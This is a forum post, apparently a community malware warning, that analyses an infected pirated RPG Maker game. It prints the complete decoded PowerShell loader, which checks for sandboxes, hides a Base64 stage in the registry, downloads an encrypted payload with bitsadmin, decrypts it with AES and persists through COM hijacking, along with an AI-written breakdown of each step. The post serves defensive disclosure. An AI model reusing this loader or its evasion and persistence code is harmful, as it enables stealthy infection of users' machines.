Install the app
How to install the app on iOS

Follow along with the video below to see how to install our site as a web app on your home screen.

Note: This feature may not be available in some browsers.

PSA: Malware detected from member's upload

I have something to report from leo0083,Today I downloaded a game called ~KIH~ 【081411】[Ero Games][ALL-TiME] Time Enclosure from him. And
The surprising thing was that when I scanned for viruses, it looked like this. Link game:https://www.anime-sharing.com/threads/kih-【081411】-エロゲーム-all-time-時間封鎖.1577387/


1775489259437.png
1775489314473.png
 
My post on f95:

View attachment 5889554


I'm analyzing the file and it does have a sandboxie detection (Scene2.ogg from infected RPGM game):
View attachment 5889596

I will post an update if i manage to decode it further.

HUGE UPDATE:
With the help of AI and some reverse engineering tools, i've managed to reverse engineer the malware inside the .ogg file and decode it, i've analysed the first part of the malware, theres a second part involving a downloaded infected .jpg file from a website which i will post later if i manage to decode it.

*update: i will post more screenshots showing the details.

PART 1 (Game.exe and Scene2.ogg):
I will use several AI promps which will help to understand what this malware is doing and how we decoded it.
Here is the first part:

Game.exe Post (First part of the malware, sideloads Scene2.ogg as DLL)
then
Scene2.ogg:
1775514096020.png



1775514154845.png



1775514163518.png


Sandboxie detection:
1775514182936.png


After trial and error, finding functions and what encryption this string was using, i got the powershell script that executes after running the game.
1775514194081.png


Will continue in next post because of attachment limit..
 
Last edited:
1775514522114.png


The encryption used was Base64-encoded UTF-16LE, after decoding we got this:

1775514530375.png


$ErrorActionPreference = "SilentlyContinue"

$ser = Get-Service -Name "SbieSvc" -ErrorAction SilentlyContinue

if ($ser) {return}

$proc = Get-Process -Name "Procmon64" -ErrorAction SilentlyContinue
if ($proc) { return }

$path = "C:\Program Files\Sandboxie"
if (-Not (Test-Path $path)) {


$d2 = ".dll"

$letras = "abcdefghijklmnopqrstuvwxyz"
$rnd = New-Object System.Random

function New-RandomString($len) {
$sb = New-Object System.Text.StringBuilder $len
for ($i = 0; $i -lt $len; $i++) {
$index = $rnd.Next(0, $letras.Length)
[void]$sb.Append($letras[$index])
}
return $sb.ToString()
}

$palabra1 = (New-RandomString 6) + $d2
$palabra2 = (New-RandomString 6) + $d2

$appDataLocal = [Environment]::GetFolderPath([Environment+SpecialFolder]::LocalApplicationData)

$subcarpetas = Get-ChildItem $appDataLocal -Directory | Select-Object -ExpandProperty FullName

$folderPath = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
$folderPath2 = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
$folderPath3 = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]

$hist = "History"

function Get-RandomFolder {
do {
$p = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
} while ($p.Contains(" ") -or $p.Contains("History"))
return $p
}

$folderPath = Get-RandomFolder
$folderPath2 = Get-RandomFolder
$folderPath3 = Get-RandomFolder

$rt2 = 'SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}'

try {

$baseKey = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
[Microsoft.Win32.RegistryHive]::CurrentUser,
[Microsoft.Win32.RegistryView]::Registry64
)

$text5 = [System.IO.Path]::Combine($folderPath2, $palabra1)

$key2 = $baseKey.OpenSubKey($rt2)

if ($key2 -ne $null) { return }

$UTEXT ="DQAKACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIADQAKACQAeQAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAiACkALgBNAEkAXwBWADIADQAKACQAbwAgAD0AIAAkAHkADQAKACQAZgAgAD0AIAAoAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAkAHkAIAAtAFAAYQByAGUAbgB0ACkAIAArACAAJwBcACcADQAKACQAaQA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABmACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACIAcwBlAHQAdABpAG4AZwBzAC4AZABhAHQAIgANAAoAJABpADIAPQBKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAiADEALgBiAGEAawAiAA0ACgAkAGEAcgBnACAAPQAgACIALwB0AHIAYQBuAHMAZgBlAHIAIgAsACIAbQBkACIALAAiAGgAdAB0AHAAcwA6AC8ALwBtAGcAegAuAGcAcgBlAGEAdAAtAHMAaQB0AGUALgBuAGUAdAAvAHoAYQBlAHMAZAAuAGoAcABnACIALAAkAGkAMgANAAoADQAKACQAcAByACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAYgBpAHQAcwBhAGQAbQBpAG4ALgBlAHgAZQAiACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAYQByAGcAIABgAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBXAGEAaQB0ACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBQAGEAcwBzAFQAaAByAHUAIABgAAoADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAMAANAAoAQwBvAHAAeQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGkAMgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABpAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGkAMgANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQANAAoAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAA0ACgAkAGEALgBLAGUAeQA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAIgB6AGIAYwBkADEAagA5ADIAMwA0AHIANgA3ADAAZQBoACIAKQANAAoAJABhAC4ASQBWAD0AJABhAC4ASwBlAHkADQAKACQAYQAuAE0AbwBkAGUAPQBbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAA0ACgAkAGQAPQAkAGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACkADQAKACQAZQA9AFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAEIAeQB0AGUAcwAoACQAaQApAA0ACgAkAGQAcwA9ACQAZAAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGUALAAwACwAJABlAC4ATABlAG4AZwB0AGgAKQANAAoADQAKACQAcgBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBhAG4AZABvAG0ATgB1AG0AYgBlAHIARwBlAG4AZQByAGEAdABvAHIAXQA6ADoAQwByAGUAYQB0AGUAKAApAA0ACgAkAHIAYQBuAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAMgANAAoAJAByAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgBhAG4AZAApAA0ACgANAAoAJABkAHMAWwAkAGQAcwAuAEwAZQBuAGcAdABoACAALQAgADIAXQAgAD0AIAAkAHIAYQBuAGQAWwAwAF0ADQAKACQAZABzAFsAJABkAHMALgBMAGUAbgBnAHQAaAAgAC0AIAAxAF0AIAA9ACAAJAByAGEAbgBkAFsAMQBdAA0ACgANAAoAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAG8ALAAkAGQAcwApAA0ACgANAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABpAA0ACgAkAGMAIAA9ACAAIgB7AEIAMgAxADAARAA2ADkANAAtAEMAOABEAEYALQA0ADkAMABEAC0AOQA1ADcANgAtADkARQAyADAAQwBEAEIAQwAyADAAQgBEAH0AIgANAAoAJABwADIAIAA9ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABDAGwAYQBzAHMAZQBzAFwAQwBMAFMASQBEAFwAJABjAFwASQBuAHAAcgBvAGMAUwBlAHIAdgBlAHIAMwAyACIACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAMgAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEMAbABhAHMAcwBlAHMAXABDAEwAUwBJAEQAXAAkAGMAXABJAG4AcAByAG8AYwBTAGUAcgB2AGUAcgAzADIAIgAgAC0ATgBhAG0AZQAgACIAKABEAGUAZgBhAHUAbAB0ACkAIgAgAC0AVgBhAGwAdQBlACAAJABvACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcADQAKAA0ACgAkAGMAIAA9ACAAIgB7AEQARABBAEYAQQBFAEEAMgAtADgAOAA0ADIALQA0AEUAOQA2AC0AQgBBAEQARQAtAEQANAA0AEEAOABEADYANwA2AEYARABCAH0AIgANAAoAJABwADMAIAA9ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABDAGwAYQBzAHMAZQBzAFwAQwBMAFMASQBEAFwAJABjAFwASQBuAHAAcgBvAGMAUwBlAHIAdgBlAHIAMwAyACIACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAMwAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEMAbABhAHMAcwBlAHMAXABDAEwAUwBJAEQAXAAkAGMAXABJAG4AcAByAG8AYwBTAGUAcgB2AGUAcgAzADIAIgAgAC0ATgBhAG0AZQAgACIAKABEAGUAZgBhAHUAbAB0ACkAIgAgAC0AVgBhAGwAdQBlACAAJABvACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcADQAKAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATQBJAF8AVgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAANAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwARQBuAHYAaQByAG8AbgBtAGUAbgB0ACIAIAAtAE4AYQBtAGUAIAAiAE0ASQBfAFYAMgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAANAAoAVQBuAHIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIAdQBwAGQAYQB0AGUALQBzAHkAcwB0AGEAcwBrACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAA0ACgAkAGEAcgBnACAAPQAgACIALwBTACIALAAiAC8AQwAiACwAIgB7AEIAMgAxADAARAA2ADkANAAtAEMAOABEAEYALQA0ADkAMABEAC0AOQA1ADcANgAtADkARQAyADAAQwBEAEIAQwAyADAAQgBEAH0AIgANAAoADQAKACQAcAByACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAdgBlAHIAYwBsAHMAaQBkAC4AZQB4AGUAIgAgAGAACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAGEAcgBnACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgBgAA0ACgANAAoA"

$envKey = 'HKCU:\Environment'
$myvar = 'MI_V'
$myvar2 = 'MI_V2'

if (Test-Path $envKey) {
Set-ItemProperty -Path $envKey -Name $myvar -Value $UTEXT -Type String
Set-ItemProperty -Path $envKey -Name $myvar2 -Value $text5 -Type String
}

$key2.Close()
$baseKey.Close()
}
catch {
}

$ups="update-systask"
$arg1 = "cmd.exe /c start '' /b powershell -NoProfile -WindowStyle Hidden -EncodedCommand %MI_V%";

$f1 = (Get-Date).AddDays(1)
$f1Str = $f1.ToString("dd/MM/yyyy", [System.Globalization.CultureInfo]::InvariantCulture)
$hStr = $f1.ToString("HH:mm", [System.Globalization.CultureInfo]::InvariantCulture)

$argts = "/create /f /sc once /st $hStr /sd $f1Str /tn `"$ups`" /tr `"$arg1`""

$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName = "schtasks"
$psi.Arguments = $argts
$psi.UseShellExecute = $false
$psi.CreateNoWindow = $true

$p5 = [System.Diagnostics.Process]::Start($psi)
$p5.WaitForExit()

}

Some variables of the code are in spanish, like subcarpetas (subfolders) and letras (letters), in this code theres a part of it which is also encrypted, if we decrypt it with the same method as before, we get this:

1775514553057.png



$ErrorActionPreference = "SilentlyContinue"

$y = (Get-ItemProperty "HKCU:\Environment").MI_V2
$o = $y
$f = (Split-Path $y -Parent) + '\'

$i = Join-Path -Path $f -ChildPath "settings.dat"
$i2 = Join-Path -Path $f -ChildPath "1.bak"

//i will censor the website because of the rules, if admins think it's too exposed, feel free to edit my post

$arg = "/transfer","md","https://mgz.great-s***.n**/zaesd.jpg",$i2

$pr = Start-Process -FilePath "bitsadmin.exe" `
-ArgumentList $arg `
-WindowStyle Hidden `
-Wait `
-PassThru

Start-Sleep -Seconds 30

Copy-Item -Path $i2 -Destination $i
Remove-Item -Path $i2

Start-Sleep -Seconds 1

$a = [System.Security.Cryptography.Aes]::Create()
$a.Key = [Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh")
$a.IV = $a.Key
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC

$d = $a.CreateDecryptor()
$e = [IO.File]::ReadAllBytes($i)
$ds = $d.TransformFinalBlock($e, 0, $e.Length)

$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
$rand = New-Object byte[] 2
$rng.GetBytes($rand)

$ds[$ds.Length - 2] = $rand[0]
$ds[$ds.Length - 1] = $rand[1]

[IO.File]::WriteAllBytes($o, $ds)

Remove-Item -Path $i

$c = "{B210D694-C0DF-490D-9576-9E20CDBC20BD}"
$p2 = "HKCU:\SOFTWARE\Classes\CLSID\$c\InprocServer32"

New-Item -Path $p2 -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null

Set-ItemProperty -Path $p2 `
-Name "(Default)" `
-Value $o `
-Type String

$c = "{DDAFAEA2-8842-4E96-BADE-D44A0D676FDB}"
$p3 = "HKCU:\SOFTWARE\Classes\CLSID\$c\InprocServer32"

New-Item -Path $p3 -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null

Set-ItemProperty -Path $p3 `
-Name "(Default)" `
-Value $o `
-Type String

Remove-ItemProperty -Path "HKCU:\Environment" -Name "MI_V" -ErrorAction SilentlyContinue | Out-Null
Remove-ItemProperty -Path "HKCU:\Environment" -Name "MI_V2" -ErrorAction SilentlyContinue | Out-Null

Unregister-ScheduledTask -TaskName "update-systask" -Confirm:$false -ErrorAction SilentlyContinue | Out-Null

$arg = "/S","/C","{B210D694-C0DF-490D-9576-9E20CDBC20BD}"

$pr = Start-Process -FilePath "verclsid.exe" `
-ArgumentList $arg `
-WindowStyle Hidden



AI explanation about the malware script:
# ============================================================
# GLOBAL SETTINGS
# ============================================================

$ErrorActionPreference = "SilentlyContinue"
# → Suppresses all errors (stealth, avoids alerts/logs)


# ============================================================
# ANTI-ANALYSIS (SANDBOX / TOOLS DETECTION)
# ============================================================

$ser = Get-Service -Name "SbieSvc" -ErrorAction SilentlyContinue
if ($ser) { return }
# → Detects Sandboxie (common malware sandbox)

$proc = Get-Process -Name "Procmon64" -ErrorAction SilentlyContinue
if ($proc) { return }
# → Detects Process Monitor (used by analysts)

$path = "C:\Program Files\Sandboxie"
if (-Not (Test-Path $path)) {
# → Only continue if Sandboxie is NOT installed


# ============================================================
# RANDOMIZATION (ANTI-DETECTION)
# ============================================================

$d2 = ".dll"

$letras = "abcdefghijklmnopqrstuvwxyz"
$rnd = New-Object System.Random

function New-RandomString($len) {
$sb = New-Object System.Text.StringBuilder $len
for ($i = 0; $i -lt $len; $i++) {
$index = $rnd.Next(0, $letras.Length)
[void]$sb.Append($letras[$index])
}
return $sb.ToString()
}

$palabra1 = (New-RandomString 6) + $d2
$palabra2 = (New-RandomString 6) + $d2
# → Generates random DLL names (evasion)

$appDataLocal = [Environment]::GetFolderPath([Environment+SpecialFolder]::LocalApplicationData)

$subcarpetas = Get-ChildItem $appDataLocal -Directory | Select-Object -ExpandProperty FullName

function Get-RandomFolder {
do {
$p = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
} while ($p.Contains(" ") -or $p.Contains("History"))
return $p
}

$folderPath = Get-RandomFolder
$folderPath2 = Get-RandomFolder
$folderPath3 = Get-RandomFolder
# → Chooses random folders in AppData\Local


# ============================================================
# REGISTRY CHECK (ANTI-REINFECTION)
# ============================================================

$rt2 = 'SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}'

$baseKey = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
[Microsoft.Win32.RegistryHive]::CurrentUser,
[Microsoft.Win32.RegistryView]::Registry64
)

$text5 = [System.IO.Path]::Combine($folderPath2, $palabra1)

$key2 = $baseKey.OpenSubKey($rt2)

if ($key2 -ne $null) { return }
# → If already installed, exit


# ============================================================
# STAGE 2 PAYLOAD (OBFUSCATED)
# ============================================================

$UTEXT = "BASE64_ENCODED_POWERSHELL_PAYLOAD"
# → HUGE Base64 blob (UTF-16 PowerShell script)


# ============================================================
# STORE PAYLOAD IN REGISTRY (FILELESS TECHNIQUE)
# ============================================================

$envKey = 'HKCU:\Environment'
$myvar = 'MI_V'
$myvar2 = 'MI_V2'

if (Test-Path $envKey) {
Set-ItemProperty -Path $envKey -Name $myvar -Value $UTEXT -Type String
Set-ItemProperty -Path $envKey -Name $myvar2 -Value $text5 -Type String
}
# → Stores:
# MI_V = encoded script
# MI_V2 = output file path


# ============================================================
# ⏰ SCHEDULED TASK (DELAYED EXECUTION)
# ============================================================

$ups="update-systask"

$arg1 = "cmd.exe /c start '' /b powershell -NoProfile -WindowStyle Hidden -EncodedCommand %MI_V%";
# → Executes encoded payload later

$f1 = (Get-Date).AddDays(1)
$f1Str = $f1.ToString("dd/MM/yyyy")
$hStr = $f1.ToString("HH:mm")

$argts = "/create /f /sc once /st $hStr /sd $f1Str /tn `"$ups`" /tr `"$arg1`""

$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName = "schtasks"
$psi.Arguments = $argts
$psi.UseShellExecute = $false
$psi.CreateNoWindow = $true

$p5 = [System.Diagnostics.Process]::Start($psi)
$p5.WaitForExit()
# → Creates scheduled task (runs next day)


# ============================================================
# SECOND STAGE (DECODED FROM $UTEXT)
# ============================================================

# (This is what gets executed later)


# --- DOWNLOAD ENCRYPTED PAYLOAD ---
//i censored the website
bitsadmin.exe /transfer md https://mgz.great-s***.n**/zaesd.jpg 1.bak

# --- MOVE FILE ---
Copy-Item 1.bak → settings.dat


# ============================================================
# ENCRYPTED PAYLOAD HANDLING (CORE SECTION)
# ============================================================

$a = [System.Security.Cryptography.Aes]::Create()

$a.Key = [Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh")
# Hardcoded AES key

$a.IV = $a.Key
# ⚠ IV = key

$a.Mode = [System.Security.Cryptography.CipherMode]::CBC

$d = $a.CreateDecryptor()

$e = [IO.File]::ReadAllBytes($i)
# → Read encrypted .jpg

$ds = $d.TransformFinalBlock($e, 0, $e.Length)
# DECRYPT → malware binary

# ============================================================
# END OF ENCRYPTED SECTION
# ============================================================


# ============================================================
# ANTI-SIGNATURE MUTATION
# ============================================================

$ds[$ds.Length - 2] = random
$ds[$ds.Length - 1] = random
# → Changes hash each run


# ============================================================
# WRITE FINAL MALWARE
# ============================================================

[IO.File]::WriteAllBytes($o, $ds)
# → Drops decrypted payload (DLL)


# ============================================================
# PERSISTENCE (COM HIJACKING)
# ============================================================

HKCU:\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32 → malicious DLL

# → Forces Windows to load attacker DLL


# ============================================================
# EXECUTION (LIVING-OFF-THE-LAND)
# ============================================================

verclsid.exe /S /C {GUID}
# → Executes DLL via trusted Windows binary


# ============================================================
# CLEANUP (ANTI-FORENSICS)
# ============================================================

Remove registry keys (MI_V, MI_V2)
Delete scheduled task
# → Removes evidence


I will post the AI full explanation about the first part of this malware script:


HIGH-LEVEL OVERVIEW

This script is a:


PowerShell dropper with sandbox evasion + staged payload + persistence
Full flow:


Anti-analysis checks

Randomized file placement

Stores encoded payload in registry

Creates scheduled task (delayed execution)

Decodes & runs second-stage script

Downloads encrypted payload

Decrypts payload (AES)

Persistence via COM hijacking

Executes malware


1. ANTI-ANALYSIS / SANDBOX DETECTION

$ser = Get-Service -Name "SbieSvc" if ($ser) {return}

Detects Sandboxie (common malware analysis sandbox)



$proc = Get-Process -Name "Procmon64" if ($proc) { return }


Detects Process Monitor (used by analysts)



$path = "C:\Program Files\Sandboxie" if (-Not (Test-Path $path)) {


If Sandboxie folder exists → exit
Otherwise → continue execution


Purpose

❗ Avoid execution in:

  • sandboxes
  • malware labs
  • analyst environments

2. RANDOMIZATION (ANTI-DETECTION)


function New-RandomString($len) { ... } $palabra1 = (New-RandomString 6) + ".dll" $palabra2 = (New-RandomString 6) + ".dll"


Generates random DLL names like:


xkqplm.dll ztrwqa.dll



$appDataLocal = [Environment]::GetFolderPath(...) $subcarpetas = Get-ChildItem $appDataLocal -Directory

Gets all folders in:

C:\Users\<user>\AppData\Local\



function Get-RandomFolder { ... }


Picks random folders excluding:


  • spaces
  • "History"

Purpose

❗ Avoid signature-based detection
❗ Hide inside legitimate-looking folders

3. REGISTRY PRE-CHECK (ANTI-REINFECTION)


$rt2 = 'SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}' $key2 = $baseKey.OpenSubKey($rt2) if ($key2 -ne $null) { return }



If registry key exists → malware already installed → exit


Purpose

Prevent duplicate infection

4. STORED PAYLOAD (OBFUSCATED)


$UTEXT = "DQAKACQARQByAHIAbwByA..."



This is:


Base64-encoded UTF-16 PowerShell script (second stage)



Set-ItemProperty HKCU:\Environment MI_V = $UTEXT Set-ItemProperty HKCU:\Environment MI_V2 = $text5



Stores:


  • encoded script
  • output file path

Purpose

❗ Fileless execution (hides payload in registry)

⏰ 5. DELAYED EXECUTION (SCHEDULED TASK)


$arg1 = "powershell ... -EncodedCommand %MI_V%"


Executes encoded payload later



schtasks /create ...


Creates scheduled task:


update-systask


Runs next day


Purpose

❗ Delay execution → evade detection
❗ survive reboot

6. SECOND STAGE EXECUTION

When task runs:



powershell -EncodedCommand %MI_V%



This decodes and executes the $UTEXT payload


7. ENCRYPTED PAYLOAD SECTION (IMPORTANT)

Inside decoded $UTEXT:


THIS IS THE ENCRYPTED PART


$a = [System.Security.Cryptography.Aes]::Create() $a.Key = [Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh") $a.IV = $a.Key $a.Mode = [System.Security.Cryptography.CipherMode]::CBC $d = $a.CreateDecryptor() $e = [IO.File]::ReadAllBytes($i) $ds = $d.TransformFinalBlock($e, 0, $e.Length)



What happens here

StepMeaning
AES CreateInitializes crypto
Key"zbcd1j9234r670eh"
IVSame as key
Read fileencrypted .jpg
Decryptproduces malware binary

BEFORE THIS (setup)


bitsadmin.exe https://.../zaesd.jpg



Downloads encrypted payload


AFTER THIS (execution)


WriteAllBytes($o, $ds)



Writes decrypted malware


8. ANTI-SIGNATURE MODIFICATION


$ds[$ds.Length - 2] = random $ds[$ds.Length - 1] = random



Corrupts last 2 bytes


Purpose

❗ Break antivirus signatures
❗ Change file hash each run

9. PERSISTENCE (COM HIJACKING)


HKCU:\SOFTWARE\Classes\CLSID\{GUID}\InprocServer32



Points CLSID to malicious DLL


Purpose

❗ Auto-load malware via Windows COM system

10. EXECUTION


verclsid.exe /S /C {GUID}



Loads malicious DLL indirectly


Purpose

❗ Stealth execution via trusted binary
(Living-off-the-land)

11. CLEANUP


Remove-ItemProperty HKCU:\Environment MI_V / MI_V2 Unregister-ScheduledTask update-systask


Purpose

❗ Remove evidence
❗ make forensic analysis harder

FINAL CLASSIFICATION

This malware uses:

Encryption

  • AES-CBC (payload protection)
Obfuscation

  • Base64 (PowerShell stage)
Evasion

  • Sandbox detection
  • Delayed execution
  • Randomized paths
Persistence

  • COM hijacking
Anti-forensics

  • Cleanup
  • Binary mutation

FINAL TAKEAWAY

The script is multi-stage malware loader


  • Stage 1: this script (setup + evasion)
  • Stage 2: encoded PowerShell (registry)
  • Stage 3: encrypted payload (AES)
  • Stage 4: DLL execution via COM hijack
End of AI analysis.

This is only the first part of the malware.

PART 1.5 (zaesd.jpg downloaded from the powershell script inside Scene2.ogg):


1775514577244.png


The second part involves it downloading a infected .jpg file (zaesd.jpg) which i renamed as .bin for safety purposes, the website it downloads from (mgz.great-s***.n** censored for safety) visually looks like a very weird porn/porn game website, containing background porn images, a ton of popups and ads, aswell as a list of porn games. The title of this website is "Gallery unlocked games", if we view the source code of the page, it also has some spanish variables, also has a contact email (meg*s****.x.00*@gmail.c** censored for safety):

1775514593495.png

Continues in the next post..

PART 1.9 Update
 
Last edited:
Another linked website in the source code:
1775514709756.png

The list of games it has is also clickable, i couldn't click any because it is full of ads, but checking the source code reveals a huge list of pixeldrain links with the games (most probably infected)
The worst part? it has 300+ possibly infected pixeldrain links:

1775514723806.png



So, visiting the image the powershell script was running leads to a blank page with an error saying the .jpg was unable to load (fake .jpg is a malware), after downloading the file, the scan didn't trigger any of the AVs (yet).

1775514735862.png


1775514747871.png


https://www.virustotal.com/gui/file/faf27ed1af822fe8816c75e172a0c315056ac2f71c7e624a6d26e70d706b1af4 zaesd.jpg file (renamed as .bin for safety)

So after we decrypt this file (AES-CBC payload decryption using the same key as before "zbcd1j9234r670eh"), we finally get a decrypted and infected malware file from our fake .jpg which was downloaded from the fake .ogg:

https://www.virustotal.com/gui/file...836d833c2118afab7faefccaadb746d41e1/detection decrypted zaesd.jpg (renamed as .bin for safety)

https://hybrid-analysis.com/sample/4be40152d1b0b0a9dba5fd70f6234836d833c2118afab7faefccaadb746d41e1

If i manage to reverse engineer this file, i will post a part 2 of this analysis, sorry for the AI text, i felt the need to do this analysis ASAP.

If a admin or anyone wants the files for a more in depth analysis i still have them, just DM me.
Also i saved the raw source code of the infected page url containing all the 300+ pixeldrain links, just contact me.

TLDR: The infected RPGM games contains a infected game.exe and a random fake file (disguised as .ogg, .js or any kind of file) which runs a very powerful powershell script which verifies for sandbox, process monitor (avoids running if detects them), generates random .dll or folders, stores a encrypted powershell script and delays it 1 day later so it activates.
The script then downloads a infected fake .jpg file from a very suspiscious website which there are 300+ pixeldrain game links that are most possibly infected. This file when decrypted, reveals a malware infected file.


Summary details from AI report:
